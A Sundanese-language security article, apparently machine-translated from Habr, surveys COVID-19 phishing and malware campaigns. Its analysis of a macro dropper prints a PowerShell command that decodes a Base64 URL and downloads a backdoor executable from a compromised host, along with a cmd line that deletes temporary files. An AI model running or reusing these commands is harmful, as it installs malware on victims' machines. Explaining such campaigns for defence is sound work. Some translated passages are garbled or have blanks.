Panyerang terus ngeksploitasi topik COVID-19, nyiptakeun langkung seueur ancaman pikeun pangguna anu resep pisan kana sagala hal anu aya hubunganana sareng wabah. DI Kami parantos nyarioskeun naon jinis malware anu muncul saatos koronavirus, sareng ayeuna urang bakal ngobrol ngeunaan téknik rékayasa sosial anu parantos dipendakan ku pangguna di sababaraha nagara, kalebet Rusia. Tren umum sareng conto aya di handapeun cut.
Inget dina Kami nyarioskeun kanyataan yén jalma-jalma daék maca henteu ngan ukur ngeunaan coronavirus sareng jalanna wabah, tapi ogé ngeunaan ukuran dukungan kauangan? Ieu conto anu saé. Hiji serangan phishing metot kapanggih dina kaayaan Jérman North Rhine-Westphalia atawa NRW. Para panyerang nyiptakeun salinan situs web Kementerian Perekonomian (), dimana saha waé tiasa ngalamar bantosan kauangan. Program sapertos kitu leres-leres aya, sareng tétéla aya mangpaatna pikeun scammers. Saatos nampi data pribadi korbanna, aranjeunna ngadamel aplikasi dina situs wéb kementerian nyata, tapi nunjukkeun detil bank anu sanés. Numutkeun data resmi, 4 sarébu requests palsu ieu dijieun nepi ka skéma kapanggih. Hasilna, $ 109 juta dimaksudkeun pikeun warga kapangaruhan murag kana leungeun fraudsters.
Naha anjeun hoyong tés gratis pikeun COVID-19?
Conto penting sanésna phishing bertema coronavirus nyaéta dina email. Pesen éta narik perhatian pangguna kalayan tawaran pikeun ngajalanan tés gratis pikeun inféksi coronavirus. Dina lampiran ieu aya conto Trickbot / Qakbot / Qbot. Sareng nalika anu hoyong mariksa kaséhatanna mimiti "ngeusian formulir anu napel," naskah jahat diunduh kana komputer. Sareng pikeun ngahindarkeun tés sandboxing, skrip mimiti ngaunduh virus utama ngan saatos sababaraha waktos, nalika sistem panyalindungan yakin yén teu aya kagiatan jahat anu bakal kajantenan.
Ngayakinkeun sabagéan ageung pangguna pikeun ngaktipkeun makro ogé gampang. Jang ngalampahkeun ieu, trik baku dipaké: pikeun ngeusian kuesioner, Anjeun mimitina kudu ngaktipkeun macros, nu hartina anjeun kudu ngajalankeun hiji Aksara VBA.
Sakumaha anjeun tiasa tingali, skrip VBA sacara khusus ditutupan ku antipirus.
Windows gaduh fitur ngantosan dimana aplikasi ngantosan / T sateuacan nampi jawaban standar "Leres". Dina kasus urang, naskah ngantosan 65 detik sateuacan ngahapus file samentawis:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Sareng bari ngantosan, malware diunduh. Skrip PowerShell khusus diluncurkeun pikeun ieu:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Saatos ngodekeun nilai Base64, skrip PowerShell ngaunduh panto tukang anu aya dina pangladén wéb anu sateuacana diretas ti Jerman:
http://automatischer-staubsauger.com/feature/777777.pngtur nyimpen eta dina ngaran:
C:UsersPublictmpdirfile1.exe
map ‘C:UsersPublictmpdir’ dihapus nalika ngajalankeun file 'tmps1.bat', nu ngandung paréntah cmd /c mkdir ""C:UsersPublictmpdir"".
Sasaran serangan dina instansi pamaréntah
Salaku tambahan, analis FireEye nembé ngalaporkeun serangan APT32 anu ditujukeun pikeun struktur pamaréntahan di Wuhan, ogé Kamentrian Manajemén Darurat Cina. Salah sahiji RTF anu disebarkeun ngandung tautan ka artikel New York Times anu judulna . Nanging, saatos maca éta, malware diunduh (analis FireEye ngidentipikasi conto éta salaku METALJACK).
Narikna, dina waktos deteksi, teu aya antivirus anu ngadeteksi conto ieu, numutkeun Virustotal.
Nalika situs wéb resmi turun
Conto anu paling keuna tina serangan phishing kajantenan di Rusia dinten ayeuna. Alesan pikeun ieu nyaéta janjian kauntungan anu ditunggu-tunggu pikeun murangkalih umur 3 dugi ka 16 taun. Nalika mimiti nampi aplikasi diumumkeun dina 12 Mei 2020, jutaan bergegas ka situs wéb State Services pikeun bantosan anu lami-lami ditunggu-tunggu sareng nurunkeun portal éta henteu langkung parah tibatan serangan DDoS profésional. Nalika présidén nyarios yén "Layanan Pamaréntah henteu tiasa ngatasi aliran aplikasi," jalma-jalma mimiti nyarios online ngeunaan peluncuran situs alternatif pikeun nampi aplikasi.
Masalahna nyaéta sababaraha situs mimiti damel sakaligus, sareng samentawis hiji, anu nyata di posobie16.gosuslugi.ru, saleresna nampi aplikasi, langkung seueur. .
Kolega ti SearchInform mendakan ngeunaan 30 domain panipuan anyar dina zona .ru. Perusahaan Infosecurity sareng Softline parantos ngalacak langkung ti 70 situs web jasa pamaréntahan palsu anu sami saprak awal April. Penciptana ngamanipulasi simbol anu biasa sareng ogé ngagunakeun kombinasi kecap gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, sareng sajabana.
Hype sareng rékayasa sosial
Sadaya conto ieu ngan ukur mastikeun yén panyerang suksés ngamonetisasi topik koronavirus. Jeung nu leuwih luhur tegangan sosial jeung isu beuki teu jelas, beuki Chances scammers kudu maok data penting, maksa jalma nyerah duit maranéhanana sorangan, atawa ngan saukur hack langkung komputer.
Sareng nunjukkeun yén pandémik parantos maksa jalma-jalma anu henteu siap pikeun damel ti bumi sacara masal, sanés ngan ukur pribadi, tapi ogé data perusahaan anu résiko. Contona, nembe Microsoft 365 (baheulana Office 365) ogé ngalaman serangan phishing. Jalma nampi pesen sora anu "lasut" ageung salaku kantétan kana hurup. Sanajan kitu, file éta sabenerna mangrupa kaca HTML nu dikirim korban serangan ka . Hasilna, kaleungitan aksés sareng kompromi sadaya data tina akun éta.
sumber: www.habr.com